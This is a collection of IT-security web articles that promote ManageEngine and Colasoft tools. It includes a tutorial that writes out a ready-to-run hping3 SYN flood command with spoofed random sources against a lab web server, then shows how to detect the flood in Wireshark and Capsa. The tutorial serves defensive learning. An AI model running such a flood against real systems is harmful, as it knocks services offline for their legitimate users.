A common metric for measuring the Wi-Fi signal strength is the Signal-to-Noise (SNR) Ratio. SNR is the ratio of signal power to the noise power and expressed in decibels. SNR of 41db is considered excellent and 10-15db is considered as poor. However, as soon as interference is experienced SINR is the metric to look for. SINR is the Signal-to-Interference plus Noise Ratio which provides the difference between the signal level and the level of interference. Since RF interference creates disrupts the user throughput, SINR provides the real performance level of the Wi-Fi systems. A higher SINR is considered good as it indicates higher data rates.

enterprise-network-monitoring-management-wifi-security-mobility-2Figure 2. OpManager: Network Analysis – Alarms, Warnings and Statistics - Click for Free Download

Shadow IT

Employees making use of third-party apps or services without the knowledge of IT, to get their job done is known as Shadow IT. Though it makes employees to choose the apps or services that works form them and be productive, it also leads to some conflicts and security issues. Using apps that are not verified by the IT team may cause serious security breaches and may even lead to loss of corporate data.

It's tough to restrict shadow IT because employees keep finding ways to find apps and services that they feel comfortable or easy-to-work with. And satisfied users use word-of-mouth marketing and increase the adoption of such apps/services among their peers. Sometimes, this creates conflict with existing IT policy and slows down the operations itself. However, the adoption of Shadow IT is on the rise. According to a study, shadow IT exists in more than 75% of the enterprises and expected to grow more.

Security Breach & Attacks

Public Wi-Fi hotspots are favorites for hackers. They try to steal data from the mobile devices that connect to the hotpots. Few years back The Guardian, a UK based journal deployed a mock Wi-Fi hotspot at an airport to demonstrate how critical information such as email ID, passwords, credit card data, etc. can be hacked via the Wi-Fi connection. Many travelers connected to hotspot and entered their details, which fraudsters could have misused in case of a real hack.

enterprise-network-monitoring-management-wifi-security-mobility-3Figure 3. OpManager: Network Bandwidth, QoS and Policy Utilization - Click for Free Download

It's highly impossible for employees or as a matter of fact for anyone to refrain themselves from connecting to public Wi-Fi when they travelling or in public places. However, hackers use public Wi-Fi to inject malicious code that acts as Trojans, which in turn helps them steal corporate data.

Bandwidth Congestion

Admins have no control when it comes to employees accessing their mobile devices for their personal use also, which includes accessing sites such as Facebook, WhatsApp, YouTube, Twitter, etc. They cannot totally restrict them as the world is becoming more social, at least online, and have to allow them to use such apps. However, it should not take a toll on the employees accessing business critical apps.

Buying additional bandwidth is the usual approach followed to solve the bandwidth crisis. However, that’s not an effective way to manage bandwidth in enterprise networks. Most enterprises spend heavily on bandwidth. According to a survey done by us with the Cisco Live US, 2015 attendees, 52% of them spend more than $25,000 per month for bandwidth.

Effective Wireless Network Management Is The Need Of The Hour

Wireless LAN Controllers (WLC) and Wireless Access Points (WAP) form the backbone of wireless network. It's very imperative to monitor them proactively so that any performance issues can be resolved before it turns big and impacts the users. Critical metrics such as SNR and SINR has also to be monitored in real-time so that any degradation in signal strength can be quickly identified and fixed. Heat-maps play a critical role in visually representing the signal strength across the floor. Make use of such heat maps and display it on the NOC screens so that any signal problem can be found out in real-time.

Having strict firewall and security policies combined with effective firewall management prevents enterprises from attacks and hacks caused due to hackers and shadow IT. For solving bandwidth related issues, network admins can make use of traffic shaping techniques to prioritize bandwidth for business critical apps. This avoids buying additional bandwidth often and helps providing adequate bandwidth for business critical apps and minimum bandwidth for non-business critical apps. 

Doing all these manually would be highly cumbersome. Look out for tools or solutions that offer proactive monitoring of wireless networks, provide heat maps to identify and measure Wi-Fi signal strength, manage firewall configurations and policies, and troubleshoot bandwidth related issues. With such a solution and strict security policies in place, you can make your network ready for mobile devices.

ManageEngine OpManager is one such network management software that offers increased visibility and great control over your network. It out-of-the-box offers network monitoring, physical and virtual server monitoring, flow-based bandwidth analysis, firewall log analysis and archiving, configuration and change management, and IP address and switch port management, in one single exe. You can monitor WiFi signal strength

  • Hits: 12881
Managing Complex Firewall Security Policies

Challenges & Solutions to Managing Firewall Rules in Complex Network Environments

firewall security rules policy managementIn today's interconnected digital landscape, where businesses rely heavily on networked systems and the internet for their operations, the importance of cybersecurity cannot be overstated. Among the essential tools in a cybersecurity arsenal, firewalls stand as a frontline defense against cyber threats and malicious actors.

One of the primary functions of a firewall is to filter traffic, which entails scrutinizing packets of data to determine whether they meet the criteria set by the organization's security policies. This process involves examining various attributes of the data packets, such as source and destination IP addresses, port numbers, and protocols. By enforcing these rules, firewalls can thwart a wide range of cyber threats, including unauthorized access attempts, malware infections, denial-of-service attacks and more.

Enforcing and managing firewall rules effectively can be a daunting task, particularly in complex network environments with numerous rules, policies and configurations. While solutions like ManageEngine Firewall Analyzer step in, to offer a comprehensive way to streamline firewall rule management and enhance security posture, it’s worthwhile take a look at the real challenges firewall rule management present across all known platforms such as Cisco (FTD, Firepower, ASA), Palo AltoPalo Alto Next-Gen firewalls, Checkpoint, Fortinet, Juniper and more.

Key Topics:

Challenges with Firewall Rule Management

Continue reading

  • Hits: 3301
Dealing with Security Audit Challenges

Dealing with Security Audit Challenges: Discovering vulnerabilities, unauthorized access, optimize network security & reporting

manageengine firewall analyzer - dealing with security audit challengesThe utilization of log analyzers, such as Firewall Analyzer, in network infrastructure plays a pivotal role in enhancing cybersecurity and fortifying the overall security posture of an organization. Security audits, facilitated by log analyzers, serve as a critical mechanism for systematically reviewing and analyzing recorded events within the network.

This proactive approach enables the identification of potential security risks, unauthorized access attempts, and abnormal activities that might signify a breach. The log analyzer sifts through vast amounts of data & logs, providing insights into patterns and anomalies that might go unnoticed otherwise.

By uncovering vulnerabilities and irregularities, organizations can take timely corrective actions, preventing potential security breaches. Moreover, the information gleaned from these audits is instrumental in formulating a comprehensive security strategy that extends across the entire network infrastructure.

ManageEngine Firewall Analyzer dashboard
ManageEngine Firewall Analyzer dashboard (click to enlarge)

This strategic approach ensures a holistic defense against cyber threats, fostering a resilient and adaptive cybersecurity framework that aligns with the evolving landscape of security challenges.

This article will delve into the concept of security audits and how a product like Firewall Analyzer can streamline this crucial procedure.

Key Topics:

Download your copy of ManageEngine's popular Firewall Analyzer here.

Security Audits Explained

Continue reading

  • Hits: 3430
Compliance in a Hybrid Work Environment

Ensuring Compliance and Business Continuity in a Hybrid Work Environment

compliance in a hybrid environmentIn the wake of digital transformation, the work landscape as we know it has undergone a dynamic shift. People can now work from home, from the office, or anywhere with a stable internet connection. Labeled as hybrid work, organizations have gradually started to adopt this seamless blend between remote work and on-site engagement.

According to the digital readiness survey by ManageEngine, remote work will have a lasting impact with 96% of organizations stating that they will be supporting remote workers for at the least the next two years. While the remote working model offers significant advantages to employees, such as a better work-life balance, it presents significant challenges for organizations in extending office-like network security.

To ensure the success of hybrid work, every organization should address challenges related to security, compliance, and data protection. This article delves into the risks and issues associated with ensuring compliance in a hybrid work environment. Let's dive in.

Key Topics:

Network Compliance in a Hybrid Work Environment

Compliance refers to the adherence of an organization's infrastructure, configuration, and policies to industry standards. In a hybrid work environment where employees are working away from the office, it becomes difficult to ensure compliance. To overcome this, companies are employing a deluge of smart monitoring systems to make sure they stay compliant with industry norms.

Besides legal obligation, compliance also helps in safeguarding networks from security incidents such as breach attempts, overlooked vulnerabilities, and other operational inefficiencies.

Consequences of Compliance Violations

Non-compliance, which refers to the failure to adhere to laws, regulations, or established guidelines, can have a wide range of repercussions that vary depending on several factors. The severity of these consequences is often determined by the nature and extent of the violation, the specific mandate or regulation that has been breached, and the subsequent impact on various stakeholders involved. Here, we delve into the potential consequences of non-compliance in more detail:

Continue reading

  • Hits: 3601
Firewall Analyzer Management Tool

Discover the Ultimate Firewall Management Tool: 7 Essential Features for Unleashing Unrivaled Network Security!

The Ultimate Firewall Management ToolFirewall security management is a combination of monitoring, configuring, and managing your firewall to make sure it runs at its best to effectively ward off network security threats. In this article, we will explore the seven must-have features of a firewall security management tool and introduce Firewall Analyzer, a popular Firewall Management Tool that has set the golden standard in Firewall Management across all vendors of firewall and security products.  Furthermore, we'll explain how central firewall policy management, VPN management, log analysis, log retention, compliance management and threat identification/forensics, help create a robust cybersecurity and network security posture that increases your organization's ability to protect its networks, information, and systems from threats.

The seven must-have features of a firewall security management tool are:

  1. Firewall Policy Management
  2. VPN Management
  3. Firewall Change Management
  4. Compliance Management
  5. Log Analysis & Threat Identification
  6. Log Retention & Forensics
  7. Network Security Alerts

Let’s take a look at each of these features and provide examples that showcase their importance.

Firewall Policy Management

Firewall Policy ManagementThis is the process of managing and organizing your firewall rules. These firewall rules and policies dictate the traffic that is entering and exiting your network, and can also be used to block illegitimate traffic.

Why is this important? Effective firewall policy management can be used to ensure firewall policies never become outdated, redundant, or misconfigured, leaving the network open to attacks.  

One of the primary challenges in firewall policy management is the potential for human error. Configuring firewall rules and policies requires a deep understanding of network architecture, application requirements, and security best practices. Unfortunately, even experienced IT professionals can make mistakes due to various factors, such as time constraints, lack of communication, or a misunderstanding of the network's specific needs.

Different individuals within an organization may also have different levels of expertise and understanding when it comes to firewall policies. This diversity in knowledge and experience can lead to inconsistencies, redundant rules, or conflicting configurations, compromising the firewall's overall effectiveness.

Taking proactive steps to manage firewall policies effectively can significantly enhance an organization's security posture and protect valuable assets from potential breaches and cyberattacks. This is where solutions such as Firewall Analyzer can undertake the burden of managing firewall policies through an intuitive, simplified and easy-to-follow interface no matter the vendor of firewall you’re dealing with.

Few of the key-features offered by Firewall Analyzer include:

  • Gain enhanced visibility on all the rules in your firewall and a comprehensive understanding of your security posture.
  • Quickly identify and record anomalies in redundant, generalized, correlated, shadowed, or grouped rules.
  • Analyze firewall policies and get suggestions on changes to rule order to optimize performance.
  • Simplify the rule creation, modification, and deletion process.
  • Check the impact of a new rule on the existing rule set.

Continue reading

  • Hits: 4208
Hacker attacking Microsoft AD

Free eBook Reveals Hackers Latest Attack Methods Against Microsoft’s Active Directory

Download free e-book covering latest attacks hackers use against Microsoft ADAre you ready to uncover the hidden vulnerabilities in your Active Directory (AD) environment and learn how to fortify your defenses against modern cyber threats? This comprehensive, free eBook delves deep into the critical aspects of AD security, presenting real-world attack scenarios and actionable defense strategies. Whether you're an IT administrator, security professional, or tech enthusiast, this resource is your gateway to a more secure IT infrastructure.

Active Directory cyber security attacks

Highlights from the eBook:

  • Understanding Active Directory Vulnerabilities: Gain a clear understanding of the common weaknesses in AD setups that hackers exploit, and how they can lead to devastating breaches.
  • LLMNR/NBT-NS Poisoning Attacks Explained: Discover how attackers manipulate name resolution protocols to intercept sensitive data and compromise systems, and learn how to prevent these tactics.
  • Defending Against SMB Relay Attacks: Learn about the mechanisms of SMB relay attacks and implement strategies to close off this dangerous avenue of attack.
  • Protecting Against Kerberoasting Attacks: Get insights into the devastating power of kerberoasting, where attackers exploit service accounts to steal credentials—and how to shield your AD from this menace.
  • Demystifying Domain Enumeration: Understand how attackers map out your domain to locate vulnerabilities, and explore countermeasures to disrupt their reconnaissance efforts.
  • Brute Force and Password Spray Attacks: Break down these relentless attack techniques and arm yourself with tools and practices to safeguard your credentials and networks.
  • Top 10 Active Directory Defense Techniques: From enforcing least-privilege principles to advanced monitoring, these strategies empower you to build a strong and resilient AD environment.

Hacker attacking Microsoft Active Directory

This eBook is a comprehensive guide designed to help you strengthen your AD defenses, improve incident detection, and protect your organization from emerging threats. With detailed explanations, step-by-step countermeasures, and expert insights, you’ll be equipped to identify vulnerabilities and implement effective security measures.

Don’t let your Active Directory become an easy target. Download the free eBook now to gain the knowledge and tools you need to stay one step ahead of attackers and secure your network!

Continue reading

  • Hits: 738
Windows Server EventLog Analyzer

Unlock Deep Visibility & Insight into Windows Server 2022 Logs

Windows Server EventLog AnalyzerThis article explores the exciting new features of Windows Server 2022 and emphasizes the critical role of analyzing Windows Server logs. You'll also discover how EventLog Analyzer provides comprehensive, helps you achieve 360-degree protection against threats targeting these logs, ensuring robust security for your server environment.

Key Topics:

Download your copy of EventLog Analyzer

Related Articles:

The Importance of Proactive Log Management

Did you know that threats targeting Windows Server and its logs are becoming more significant? To protect your systems, you must monitor and analyze these logs effectively. Ensuring system security, compliance, and health requires effective log management.

Administrators can ensure optimal performance by promptly identifying and resolving issues through routine log review. Log analysis also protects sensitive data by assisting in the detection of any security breaches and unwanted access. Proactive log management ultimately improves the security and dependability of the IT infrastructure as a whole.

EventLog Analyzer monitors various Windows event logs, such as security audit, account management, system, and policy change event logs. The insights gleaned from these logs are displayed in the forms of comprehensive reports and user-friendly dashboards to facilitate the proactive resolution of security issues.

Windows Server 2022 and its Key Features

Windows Server 2022 is a server operating system developed by Microsoft as a part of the Windows New Technology family. It is the most recent version of the Windows Server operating system, having been released in August 2021. Large-scale IT infrastructures can benefit from the enterprise-level administration, storage, and security features offered by Windows Server 2022. Compared to its predecessors, it has various new and improved capabilities, with an emphasis on application platform advancements, security, and hybrid cloud integrations.

Let’s take a look at a few key features of Windows Server 2022:

  • Cutting-edge security features, such as firmware protection, virtualization-based security, hardware roots of trust, and secured-core servers, that protect against complex attacks.
  • Improved management and integrations with Azure services via Azure Arc's support for hybrid cloud environments.
  • New storage features, which include Storage Migration Service enhancements, support for larger clusters, and improvements to Storage Spaces Direct.
  • Enhancements to Kubernetes, container performance, and Windows containers in Azure Kubernetes Service to improve support for containerized applications.
  • Support for more powerful hardware configurations, including more memory and CPU capacity, with enhanced performance for virtualized workloads.
  • File size reductions during transfers to increase efficiency and speed through the use of Server Message Block (SMB) compression.
  • An integration with Azure Automanage for easier deployment, management, and monitoring of servers in hybrid and on-premises environments.
  • Improved networking features, such as enhanced network security and performance as well as support for DNS over HTTPS.
  • Enhanced VPN and hybrid connectivity options, such as an SMB over QUIC capability that permits safe, low-latency file sharing over the internet.
  • Improvements to Windows Subsystem for Linux and tighter integration for cross-platform management, which provides better support for executing Linux workloads.
  • A range of flexible deployment and licensing options, such as the usage of Azure's subscription-based licensing.
  • Support for modernizing existing .NET applications and developing new applications using the latest .NET 5.0 technologies.
  • Enhanced automation capabilities with the latest version of PowerShell, PowerShell 7.

Understanding Windows Server Logs

Windows Server event logs are records of events that occur within the operating system or other software running on a Windows server. You can manage, observe, and troubleshoot the server environment with the help of these logs. The logs capture numerous pieces of information, such as application problems, security incidents, and system events. By examining and evaluating these logs, administrators can ensure the security, functionality, and health of the server.

Continue reading

  • Hits: 1127
Windows Server Threat Detection

Detecting Windows Server Security Threats with Advanced Event Log Analyzers

Windows Server Threat DetectionWindows Servers stand as prime targets for hackers and malicious actors due to their widespread usage and historical vulnerabilities. These systems often serve as the backbone for critical business operations, housing sensitive data and facilitating essential services. However, their prevalence also makes them vulnerable to cyber threats, including ransomware attacks, distributed denial-of-service (DDoS) assaults and more.

Windows Servers have a documented history of vulnerabilities and exploits, which further intensifies their attractiveness to attackers seeking to exploit weaknesses for unauthorized access or data theft. Consequently, it is paramount for organizations to prioritize mitigating these risks and safeguarding the integrity and continuity of operations within Windows Server environments.

Fortunately, tools like EventLog Analyzer offer robust capabilities for automatically identifying and countering such threats, uplifting the security posture of Windows Server setups. To effectively leverage these defenses, it's imperative to understand the nature of common Windows server threats and how they manifest. In this document, we delve into several prevalent threats targeting Windows servers and outline strategies for their detection and mitigation.

Furthermore, implementing robust security measures, such as regular patching, network segmentation, intrusion detection systems, and data encryption, Windows VM Backups, is essential to fortify Windows Servers against potential threats and ensure the resilience of critical business functions.

Key Topics:

Download now the world’s leading Event Log Management System.

Common Windows Server Threats

Windows Server, Ransomware, Threats, Phishing, DoS, Attacks, EventLog, Log, Detection

Continue reading

  • Hits: 3595
Event Log Monitoring System

Event Log Monitoring System: Implementation, Challenges & Standards Compliance. Enhance Your Cybersecurity Posture

eventlog analyzerAn event log monitoring system, often referred to as an event log management, is a critical component to IT security & Management, that helps organizations strengthen their cybersecurity posture. It’s a sophisticated software solution designed to capture, analyze, and interpret a vast array of event logs generated by various components within an organization's IT infrastructure such as firewalls (Cisco ASA, Palo Alto etc), routers, switches, wireless controllers, Windows servers, Exchange server and more.

These event logs can include data on user activities, system events, network traffic, and security incidents and more. By centralizing and scrutinizing these logs in real-time, event log monitoring systems play a pivotal role in enhancing an organization's security posture, enabling proactive threat detection, and facilitating compliance with regulatory requirements.

Key Topics:

Event Log Categories

Event Log Monitoring Systems empowers organizations to identify and respond to potential security threats, operational issues, and compliance breaches promptly, making it an indispensable tool for maintaining the integrity and reliability of modern digital ecosystems.

All logs contain the following basic information:

Continue reading

  • Hits: 5934

How to Perform TCP SYN Flood DoS Attack & Detect it with Wireshark - Kali Linux hping3

wireshark logoThis article will help you understand TCP SYN Flood Attacks, show how to perform a SYN Flood Attack (DoS attack) using Kali Linux & hping3 and correctly identify one using the Wireshark protocol analyser. We’ve included all necessary screenshots and easy to follow instructions that will ensure an enjoyable learning experience for both beginners and advanced IT professionals.

DoS attacks are simple to carry out, can cause serious downtime, and aren’t always obvious. In a SYN flood attack, a malicious party exploits the TCP protocol 3-way handshake to quickly cause service and network disruptions, ultimately leading to an Denial of Service (DoS) Attack. These type of attacks can easily take admins by surprise and can become challenging to identify. Luckily tools like Wireshark makes it an easy process to capture and verify any suspicions of a DoS Attack.

Key Topics:

There’s plenty of interesting information to cover so let’s get right into it.

How TCP SYN Flood Attacks Work

When a client attempts to connect to a server using the TCP protocol e.g (HTTP or HTTPS), it is first required to perform a three-way handshake before any data is exchanged between the two. Since the three-way TCP handshake is always initiated by the client it sends a SYN packet to the server.

 tcp 3 way handshake

The server next replies acknowledging the request and at the same time sends its own SYN request – this is the SYN-ACK packet. The finally the client sends an ACK packet which confirms both two hosts agree to create a connection. The connection is therefore established and data can be transferred between them.

Read our TCP Overview article for more information on the 3-way handshake

In a SYN flood, the attacker sends a high volume of SYN packets to the server using spoofed IP addresses causing the server to send a reply (SYN-ACK) and leave its ports half-open, awaiting for a reply from a host that doesn’t exist:

Performing a TCP SYN flood attack

In a simpler, direct attack (without IP spoofing), the attacker will simply use firewall rules to discard SYN-ACK packets before they reach him. By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s resources. In this state, the target struggles to handle traffic which in turn will increase CPU usage and memory consumption ultimately leading to the exhaustion of its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate client requests and ultimately lead to a Denial-of-Service.

How to Perform a TCP SYN Flood Attack with Kali Linux & hping3

However, to test if you can detect this type of a DoS attack, you must be able to perform one. The simplest way is via a Kali Linux and more specifically the hping3, a popular TCP penetration testing tool included in Kali Linux.

Alternatively Linux users can install hping3 in their existing Linux distribution using the command:

# sudo apt-get install hping3

In most cases, attackers will use hping or another tool to spoof IP random addresses, so that’s what we’re going to focus on.  The line below lets us start and direct the SYN flood attack to our target (192.168.1.159): 

# hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.159

Let’s explain in detail the above command:

We’re sending 15000 packets (-c 15000) at a size of 120 bytes (-d 120) each. We’re specifying that the SYN Flag (-S) should be enabled, with a TCP window size of 64 (-w 64). To direct the attack to our victum’s HTTP web server we specify port 80 (-p 80) and use the --flood flag to send packets as fast as possible. As you’d expect, the --rand-source flag generates spoofed IP addresses to disguise the real source and avoid detection but at the same time stop the victim’s SYN-ACK reply packets from reaching the attacker.

How to Detect a SYN Flood Attack with Wireshark

Now the attack is in progress, we can attempt to detect it. Wireshark is a little more involved than other commercial-grade software. However, it has the advantage of being completely free, open-source, and available on many platforms.

In our lab environment, we used a Kali Linux laptop to target a Windows 10 desktop via a network switch. Though the structure is insecure compared to many enterprise networks, an attacker could likely perform similar attacks after some sniffing. Recalling the hping3 command, we also used random IP addresses, as that’s the method attackers with some degree of knowledge will use.

Even so, SYN flood attacks are quite easy to detect once you know what you’re looking for. As you’d expect, a big giveaway is the large amount of SYN packets being sent to our Windows 10 PC.

Straight away, though, admins should be able to note the start of the attack by a huge flood of TCP traffic. We can filter for SYN packets without an acknowledgment using the following filter:  tcp.flags.syn == 1 and tcp.flags.ack == 0

tcp syn flood attack detection with wireshark

As you can see, there’s a high volume of SYN packets with very little variance in time. Each SYN packet shows it’s from a different source IP address with a destination port 80 (HTTP), identical length of 120 and window size (64). When we filter with tcp.flags.syn == 1 and tcp.flags.ack == 1 we can see that the number of SYN/ACKs is comparatively very small. A sure sign of a TCP SYN attack.

tcp syn flood attack detection with wireshark

We can also view Wireshark’s graphs for a visual representation of the uptick in traffic. The I/O graph can be found via the Statistics>I/O Graph menu. It shows a massive spike in overall packets from near 0 to up to 2400 packets a second.

tcp syn flood attack wireshark graph

By removing our filter and opening the protocol hierarchy statistics, we can also see that there has been an unusually high volume of TCP packets:

tcp syn flood attack wireshark protocol hierarchy stats

All of these metrics point to a SYN flood attack with little room for interpretation. By use of Wireshark, we can be certain there’s a malicious party and take steps to remedy the situation.

Summary

In this article we showed how to perform a TCP SYN Flood DoS attack with Kali Linux (hping3) and use the Wireshark network protocol analyser filters to detect it. We also explained the theory behind TCP SYN flood attacks and how they can cause Denial-of-Service attacks.

  • Hits: 279795

How to Detect SYN Flood Attacks with Capsa Network Protocol Analyzer & Create Automated Notification Alerts

Network Hacker Executing a SYN Flood AttackThis article explains how to detect a SYN Flood Attack using an advanced protocol analyser like Colasoft Capsa. We’ll show you how to identify and inspect abnormal traffic spikes, drill into captured packets and identify evidence of flood attacks. Furthermore we’ll configure Colasoft Capsa to automatically detect SYN Flood Attacks and send automated alert notifications .

Denial-of-Service (DoS) attacks are one of the most persistent attacks network admins face due to the ease they can be carried out. With a couple of commands, an attacker can create a DoS attack capable of disrupting critical network services within an organization.

There are a number of ways to execute a DoS attack, including ARP poisoning, Ping Flood, UDP Flood, Smurf attack and more but we’re going to focus on one of the most common: the SYN flood (half-open attack). In this method, an attacker exploits the TCP handshake process.

In a regular three-way TCP handshake, the user sends a SYN packet to a server, which replies with a SYN-ACK packet. The user replies with a final ACK packet, completing the process and establishing the TCP connection be established after which data can be transferred between the two hosts:

tcp 3 way handshake

However, if a server receives a high volume of SYN packets and no replies (ACK) to its SYN-ACK packets, the TCP connections remain half-open, assuming natural network congestion:

syn flood attack

By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s available ports. In this state, the target struggles to handle traffic which in turn will increase CPU usage and memory consumption ultimately leading to the exhaustion of its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate clients requests and ultimately lead to a Denial-of-Service.

Detecting & Investigating Unusual Network Traffic

Fortunately, there are a number of software that can detect SYN Flood attacks. Wireshark is a strong, free solution, but paid versions of Colasoft Capsa make it far easier and quicker to detect and locate network attacks. Graph-oriented displays and clever features make it simple to diagnose issues.

As such, the first point of call for detecting a DoS attack is the dashboard. The overview of your network will make spikes in traffic quickly noticeable. You should be able to notice an uptick in the global utilization graph, as well as the total traffic by bytes:

tcp syn flood attack packet analyzer dashboardClick to enlarge

However, spikes in network utilization can happen for many reasons, so it’s worth drilling down into the details. Capsa makes this very easy via its Summary tab, which will show packet size distribution, TCP conversation count, and TCP SYN/SYN-ACK sent.

In this case, there’s an abnormal number of packets in the 128-255 range, but admins should look out for strange distributions under any heading as attackers can specify a packet size to suit their needs. However, a more telling picture emerges when looking at TCP SYN Sent, which is almost 4000 times that of SYN-ACK:

tcp syn flood attack packet analysisClick to enlarge

Clearly, there’s something wrong here, but it’s important to find the target of the SYN packets and their origin.

There a couple of ways to do this, but the TCP Conversation tab is easiest. If we sort by TCP, we can see that the same 198-byte packet is being sent to our victim PC on port 80:

tcp syn flood attack packet analysisClick to enlarge

After selecting one of these entries and decoding the packets, you may see the results below. There have been repeated SYN packets and the handshake isn’t performed normally in many cases:

tcp syn flood flow analysisClick to enlarge

The attack becomes most clear when viewing IP Conversation in Capsa’s Matrix view, which reveals thousands of packets sent to our victim PC from random IP addresses. This is due to the use of IP spoofing to conceal their origin. If the attacker isn’t using IP spoofing, Capsa’s Resolve address will be able to resolve the IP address and provide us with its name. If they are, finding the source is likely far more trouble than it’s worth:

tcp syn flood attack matrixClick to enlarge

At this point, we can be certain that an SYN flood attack is taking place, but catching such attacks quickly really pays. Admins can use Capsa’s Alarm Explorer to get an instant notification when unusual traffic is detected:

tcp syn flood attack alarm creation

A simple counter triggers a sound and email when a certain number of SYN packets per second are detected. We set the counter to 100 to test the functionality and Capsa immediately sent us an alert once we reached the configured threshold:

tcp syn flood attack alarm

Capsa also lets users set up their own pane in the dashboard, where you can display useful graphs like SYN sent vs SYN-ACK, packet distribution, and global utilization. This should make it possible to check for a SYN flood at a glance when experiencing network slowdowns:

tcp syn flood attack packet analysis dashboard

Alternatively, Capsa’s Enterprise Edition lets admins start a security analysis profile, which contains a dedicated DoS attack tab. This will automatically list victims of an SYN flood attack and display useful statistics like TCP SYN received and sent. It also allows for quick access to TCP conversation details, letting admins decode quickly and verify attacks:

tcp syn flood attack tab

Click to enlarge

Together, these techniques should be more than enough to catch SYN floods as they start and prevent lengthy downtime.

Summary

This article explained how SYN Flood Attacks work and showed how to detect SYN Flood attacks using Colasoft Capsa. We saw different ways to identify abnormal traffic spikes within the network, how to drill into packets and find evidence of possible attacks. Finally we showed how Capsa can be configured to automatically detect SYN Flood Attacks and create alert notifications.

  • Hits: 10778

Advanced Network Protocol Analyzer Review: Colasoft Capsa Enterprise 11

Firewall.cx has covered Colasoft Capsa several times in the past, but its constant improvements make it well worth revisiting. Since the last review, the version has bumped from 7.6.1 to 11.1.2+, keeping a similar interface but scoring plenty of new features. In fact, its change is significant enough to warrant a full re-evaluation rather than a simple comparison.

For the unfamiliar, Colasoft Capsa Enterprise is a widely respected network protocol analyzer that goes far beyond free packet sniffers like Wireshark. It gives users detailed information about packets, conversations, protocols, and more, while also tying in diagnosis and security tools to assess network health. It was named as a visionary in Gartner’s Magic Quadrant for Network Performance Monitoring and Diagnostics in 2018, which gives an idea of its power. Essentially, it’s a catch-all for professionals who want a deeper understanding of their network.

Installing Capsa Enterprise 11

The installation of Capsa Enterprise is a clear merit, requiring little to no additional configuration. The installer comes in at 84 MB, a very reasonable size that will be quick to download on most connections. From there, it’s a simple case of pressing Next a few times.

However, Colasoft does give additional options during the process. There’s the standard ability to choose the location of the install, but also choices of a Full, Compact, or Custom install. It lets users remove parts of the network toolset as required to reduce clutter or any other issues. Naturally, Firewall.cx is looking at the full capabilities for the purpose of this review.

capsa enterprise v11 installation options

The entire process takes only a few minutes, with Capsa automatically installing the necessary drivers. Capsa does prompt a restart after completion, though it can be accessed before then to register a serial number. The software offers both an online option for product registration and an offline process that makes use of a license file. It’s a nice touch that should appease the small percentage of users without a connection.

Using Capsa Enterprise 11

After starting Capsa Enterprise for the first time, users are presented with a dashboard that lets them choose a network adapter, select an analysis profile, or load packet files for replay. Selecting an adapter reveals a graph of network usage over time to make it easier to discern the right one. A table above reveals the speed, number of packets sent, utilization, and IP address to make that process even easier.

capsa enterprise v11 protocol analyzer dashboard

 However, it’s after pressing the Start button that things get interesting. As data collection begins, Capsa starts to display it in a digestible way, revealing live graphs with global utilization, total traffic, top IP addresses, and top application protocols.

capsa enterprise v11 dashboard during capture

Users can customize this default screen to display most of the information Capsa collects, from diagnoses to HTTP requests, security alarms, DNS queries, and more. Each can be adjusted to update at an interval from 1 second to 1 hour, with a choice between area, line, pie, and bar charts. The interface isn’t the most modern we’ve seen, but it’s hard to ask for more in terms of functionality.

Like previous versions, Capsa Enterprise 11 also presents several tabs and sub-tabs that provide deeper insights. A summary tab gives a full statistical analysis of network traffic with detailed metadata. A diagnosis tab highlights issues your network is having on various layers, with logs for each fault or performance issue.

In fact, the diagnosis tab deserves extra attention as it can also detect security issues. It’s a particular help with ARP poisoning attacks due to counts of invalid ARP formats, ARP request storms, and ARP scans. After clicking on the alert, admins can see the originating IP and MAC address and investigate.

capsa enterprise v11 diagnosis tab

When clicking on the alert, Capsa also gives possible causes and resolutions, with the ability to set up an alarm in the future via sound or email. An alarm explorer sub-menu also gives an overview of historic triggers for later review. To reduce spam, you can adjust your alarms or filter specific errors out of the diagnosis system.

capsa enterprise v11 analysis profile setting

Naturally, this is a great help, and the ability to define such filters is present in every aspect of the software. You can filter by IP, MAC address, and issue type, as well as more complex filters. Admins can remove specific traffic either at capture or afterward. Under Packet Analysis, for example, you can reject specific protocols like HTTP, Broadcast, ARP, and Multicast.

capsa enterprise v11 packet analysis filters

If you filter data you’ve already captured, it gets even more powerful, letting you craft filters for MAC addresses in specific protocols, or use an advanced flowchart system to include certain time frames. The massive level of control makes it far easier to find what you’re looking for.

After capture is complete, you can also hit the Conversation Filter button, a powerful tool that lets you accept/reject data in the IP, TCP, and UDP Conversations tabs. Again, it takes advantage of a node-based editor plus AND/OR/NOT operators for easy creation. You can even export the filters for use on a different PC.

capsa enterprise v11 adding conversation filter

When you begin a capture with conversation filters active, Capsa will deliver a pop-up notification. This is a small but very nice touch that should prevent users wondering why only certain protocols or locations are showing.

capsa enterprise v11 packet capture filter us traffic

Once enabled, the filter will begin adjusting the data in the tab of the selected conversation type. Admins can then analyze at will, with the ability to filter by specific websites and look at detailed packet information.

capsa enterprise v11 ip conversation tab

The packet analysis window gives access to further filters, including address, port, protocol, size, pattern, time, and value. You can also hit Ctrl+F to search for specific strings in ASCII, HEX, and UTF, with the ability to choose between three layout options.

capsa enterprise v11 packet capture filter analysis

However, though most of your time will be spent in Capsa’s various details, its toolbar is worth a mention. Again, there’s a tabbed interface, the default being Analysis. Here you’ll see buttons to stop and start capture, view node groups, set alarms for certain diagnoses, set filters, and customize the UI.

capsa enterprise v11 dashboard v2

However, most admins will find themselves glancing at it for its pps, bps, and utilisation statistics. These update every second and mean you can get a quick overview no matter what screen you’re on. It combines with a clever grid-based display for packet buffer, which can be quickly exported for use in other software’s or replays.

Another important section is the Tools tab, which gives access to Capsa’s Base64 Codec, Ping, Packet Player, Packet Builder, and MAC Scanner applications. These can also be accessed via the file menu in the top left but having them for quick access is a nice touch.

capsa enterprise v11 tools

Finally, a Views tab gives very useful and quick access to a number of display modes. These enable panels like the alarm view and let you switch between important options like IP/MAC address only or name only modes.

capsa enterprise v11 views tab

 In general, Colosoft has done a great job of packing a lot of information into one application while keeping it customizable. However, there are some areas where it really shines, and its Matrix tab is one of those. With a single click, you can get a visual overview of much of the conversations on a network, with Top 100 MAC, MAC Node, IP Conversation, and IP Node views:

capsa enterprise v11 top 100 mac matrix

